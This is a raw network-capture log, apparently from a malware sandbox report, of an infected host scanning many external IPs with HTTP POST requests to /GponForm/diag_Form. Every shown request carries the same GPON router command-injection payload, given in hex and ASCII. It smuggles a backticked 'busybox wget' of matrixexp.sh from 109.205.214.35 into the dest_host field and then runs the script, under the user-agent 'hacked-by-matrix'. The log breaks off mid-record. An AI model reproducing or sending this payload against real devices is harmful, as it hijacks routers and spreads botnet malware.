                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2149192.168.2.13429885.126.77.27443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.887495041 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2150192.168.2.13340325.162.158.158443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.887516975 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2151192.168.2.1351324118.234.132.59443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.887521029 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2152192.168.2.1350194118.23.27.122443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.887545109 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2153192.168.2.1338380118.202.213.169443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.887562990 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2154192.168.2.1351494109.215.9.155443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.887578964 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2155192.168.2.1356186212.143.172.26443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.887588978 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2156192.168.2.13362905.51.251.146443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.887608051 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2157192.168.2.1345666109.38.131.68443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.887614012 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2158192.168.2.1353932118.228.234.147443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.887620926 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2159192.168.2.136092642.64.154.167443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.887626886 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2160192.168.2.13334925.61.58.3443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.887653112 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2161192.168.2.133509042.38.237.154443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.887665033 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2162192.168.2.1338312109.25.241.82443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.887670994 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2163192.168.2.1342680212.190.244.1443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.887691975 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2164192.168.2.134616242.186.163.123443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.887698889 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2165192.168.2.1335422109.237.191.238443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.887731075 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2166192.168.2.1335984212.176.159.101443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.887732029 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2167192.168.2.1358812109.82.68.42443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.887736082 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2168192.168.2.1343134109.76.37.149443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.887764931 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2169192.168.2.13514625.118.99.133443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.887773991 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2170192.168.2.13555505.124.0.76443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.887779951 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2171192.168.2.133336842.245.6.92443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.887785912 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
